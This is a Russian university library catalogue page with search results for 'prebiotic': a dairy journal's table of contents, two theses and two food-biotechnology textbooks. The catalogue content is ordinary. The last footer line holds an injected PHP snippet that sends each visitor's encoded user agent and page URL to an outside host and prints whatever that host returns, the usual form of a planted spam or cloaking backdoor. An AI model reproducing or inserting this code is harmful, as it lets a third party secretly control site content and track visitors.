Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

293 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРЕБИОТИК")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 5
1. 
Молочная промышленность. - Журнал, 2012г. № 2
Оглавление 
  • Лисин, П. А. Биотермодинамический метод оценки структурообразования молочно-белкового сгустка / П. А. Лисин, Ю. А. Канушина, И. В. Кистер. - с.76-77
  • Снегова, В. Н. Растительные жиры для сухого молока / В. Н. Снегова. - с.75
  • Архипов, А. Н. Структурообразование молочных продуктов / А. Н. Архипов, А. А. Майоров. - с.74
  • Кисломолочные напитки с экстрактами растительного сырья. - с.72-73
  • Сапарбекова, А. А. Функциональный комбинированный кисломолочный продукт / А. А. Сапарбекова, Г. Н. Журавлев, Т. Б. Ногаев. - с.70-71
  • Смирнова, Н. А. Влияние пектина на свойства ферментированного сливочного биокорректора / Н. А. Смирнова. - с.67-68
  • Кисломолочный продукт, обогащенный магнием. - с.65-66
  • Создавать будущее - значит всерьез заниматься настоящим!. - с.64
  • Крючкова, В. В. Кисломолочный биопродукт с растительными компонентами / В. В. Крючкова, Н. Н. Яценко, В. Ю. Контарева. - с.62
  • Международные критерии безопасности использования бифидобактерий. - с.61
  • Страничка технолога. - с.60
  • Ганина, В. И. Иммобилизация пробиотических микроорганизмов на бионосителях / В. И. Ганина, Н. В. Ананьева, А. В. Захарченко. - с.57-58
  • Харитонов, В. Д. Спектральный анализ в ближней области инфракрасного спектра / В. Д. Харитонов, Е. А. Юрова, А. И. Чигасов. - с.55-56
  • Соколов, Д. М. Микробиологический контроль с использованием петрифильмов / Д. М. Соколов, М. С. Соколов. - с.53-54
  • Гинзбург, О. Современные методики определения антибиотиков в молоке / О. Гинзбург. - с.50-51
  • Леонидов, Д. С. Пребиотик лактулоза: эффективная стратегия развития здорового питания / Д. С. Леонидов. - с.49
  • Кутузова, Е. Л. Ставка на сыворотку / Е. Л. Кутузова, С. Н. Коновалов. - с.47-48
  • Медведев, О. В. Обратный осмос как путь к новому качеству продуктов / О. В. Медведев. - с.44
  • Дымар, О. В. Республика Беларусь: основные направления переработки сыворотки / О. В. Дымар. - с.40-43
  • Мембранное оборудование от компании Kieselmann. - с.39
  • Гаврилов, Г. Б. Выбор мембранных методов обработки сыворотки: с чего начать / Г. Б. Гаврилов. - с.38
  • Обработка молочного сырья мембранными методами. - с.34-37
  • Комплексные решения от "Русской Трапезы". - с.33
  • Бурыкин, А. И. О физической модели процесса гомогенизации / А. И. Бурыкин. - с.30-32
  • Демин, И. Оптимизация процессов создания добавленной стоимости при помощи "умного использования" сырья. Оптимизированные рецептуры с точки зрения качества продукции и прибыли производства / И. Демин, Г. Шальк. - с.28-29
  • Рыбицкая, А. Р. Ноймо СНГ / А. Р. Рыбицкая. - с.26-27
  • Наджар, А. Особенности импортного оформления оборудования / А. Наджар. - с.24-25
  • Проект Технического регламента Таможенного союза "Молоко и молочная продукция". Позиция Республики Казахстан. - с.21-23
  • Серегин, С. Н. Таможенный союз: новые горизонты экономического роста и развития агропродовольственного рынка единого экономического пространства / С. Н. Серегин, О. Н. Каширина, К. В. Колончин. - с.19-21
  • Разгуляев, В. Ю. Изменение плана производства - прибыль или убыток / В. Ю. Разгуляев. - с.15-17
  • Мониторинг молочной продукции: потребительский рынок Санкт-Петербурга. - с.10-12
  • Смирнов, Е. Р. Мировой молочный рынок - 2010-2011 гг. / Е. Р. Смирнов. - с.5-9
2. 
Разработка технологии антистрессового творожного биопродукта "Радость" для школьников подросткового возраста [Текст] / ОмГТУ, 2014. - 17 с.
Держатели документа (Информация об экземплярах) 
3. 
Разработка технологии зерненого творога, творожного биопродукта для школьников подросткового возраста [Текст] / ОмГТУ, 2015. - 19 с.
Держатели документа (Информация об экземплярах) 
4. 
Нетрусов, Александр Иванович. Введение в биотехнологию [Текст] / А. И. Нетрусов, 2014. - 280, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник создан в соответствии с Федеральным государственным образовательным стандартом по направлению подготовки "Биология" (квалификация "бакалавр").

В учебнике приведены современные сведения об основах биотехнологии и промышленной микробиологии, рассмотрены объекты и методы биотехнологии микроорганизмов, приведены сведения о процессах получения различных веществ с помощью микробов, генно-модифицированных штампов, возобновляемых источников энергии и их выделения с применением мембранных технологий; описаны приемы выращивания микробных, растительных и животных клеток и очистки биотехнологических продуктов. Рассмотрены традиционные и современные биотехнологии для получения пищевых продуктов с применением твердофазного культивирования, иммобилизованных клеток и другие аспекты этой современной, постоянно развивающейся науки, включая патентование биологических объектов и создание нового биотехнологического производства.

Для студентов учреждений высшего образования.

5. 
Артюхова, Светлана Ивановна. Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 310 с.
Оглавление 
  • Введение. - с.6
  • Питание человека. Общие положения. - с.8
  • Роль пищи для организма человека. - с.8
  • Теория питания. - с.9
  • Физиология пищеварения. - с.28
  • Пищевой рацион современного человека. - с.39
  • Основные нарушения питания и их влияние на здоровье. - с.40
  • Контрольные вопросы. - с.42
  • Характеристика важнейших компонентов пищи. - с.43
  • Белки. - с.43
  • Характеристика белков. - с.45
  • Функциональные свойства белка. - с.46
  • Превращение белков при производстве пищевых продуктов. - с.51
  • Липиды. - с.54
  • Характеристики липидов. - с.54
  • Функциональные свойства липидов. - с.57
  • Превращение липидов при производстве пищевых продуктов. - с.60
  • Углеводы. - с.64
  • Характеристика углеводов. - с.64
  • Физиологическое значение углеводов. - с.68
  • Превращение углеводов при производстве пищевых продуктов. - с.70
  • Минеральные вещества. - с.73
  • Характеристика минеральных веществ. - с.73
  • Физиологическое значение минеральных веществ для организма человека. - с.75
  • Влияние технологической обработки на витаминный состав пищевых продуктов. - с.94
  • Ферменты. - с.97
  • Характеристика ферментов. - с.97
  • Применение ферментных препаратов в пищевых биотехнологиях. - с.104
  • Вода. - с.106
  • Характеристика воды. - с.106
  • Свободная и связанная влага в пищевых продуктах. - с.109
  • Активность воды. - с.111
  • Контрольные вопросы. - с.113
  • Пищевые добавки. - с.114
  • Характеристика и классификация пищевых добавок. - с.114
  • Гигиеническая регламентация пищевых добавок в продуктах питания. - с.117
  • Характеристика некоторых пищевых добавок. - с.120
  • Ароматизаторы. - с.120
  • Красители. - с.123
  • Подсластители. - с.132
  • Пряности. - с.136
  • Специи. - с.144
  • Пищевые кислоты. - с.158
  • Контрольные вопросы. - с.163
  • Биологически активные добавки. - с.164
  • Биологически активные добавки. - с.164
  • Эубиотики - биологически активные вещества для здоровья. - с.169
  • Пробиотики. - с.170
  • Пребиотики. - с.186
  • Синбиотики. - с.201
  • Контрольные вопросы. - с.204
  • Научные основы биотехнологии современных продуктов питания. - с.205
  • Теоретические принципы конструирования и проектирования продуктов питания. - с.205
  • Проектирование состава и свойств функциональных продуктов питания. - с.208
  • Получение пищевых продуктов, ингредиентов, материалов на основе биокаталических процессов обработки коллагенсодержащих животных тканей. - с.215
  • Современные физические методы обработки молочного сырья и пути их использования в производстве функциональных продуктов питания. - с.217
  • Инновационные методы в производстве функциональных продуктов на основе последних достижений науки и техники. - с.223
  • Основные направления пищевых нанотехнологий . - с.227
  • Нанонутриенты. - с.229
  • Наноструктурированные пищевые продукты. - с.230
  • Наноинкапсулированные пищевые вещества. - с.231
  • Нанотранспортные системы, биологически активные добавки к пище и пищевые добавки. - с.234
  • Особенности применения нанотехнологий в молочной промышленности. - с.235
  • Нанотехнологии в пастеризации молока. Низкотемпературные пастеризаторы с инфракрасным нагревом. - с.240
  • Применение нанотехнологий в других отраслях пищевой промышленности. - с.243
  • Применение нанотехнологии при производстве упаковочных материалов для пищевых продуктов и материалов, контактирующих с ними. - с.246
  • Проблемы контроля и оценки безопасности искусственных наноматериалов в составе пищевых продуктов. - с.252
  • Контрольные вопросы. - с.263
  • Искусственная и генномодифицированная пища. - с.264
  • Искусственная пища. - с.364
  • Генетически модифицированные продукты. - с.266
  • Контрольные вопросы. - с.277
  • Заключение. - с.278
  • Библиографический список. - с.279
  • Предметный указатель. - с.300
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.97 с.14 запросов, 0.79c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;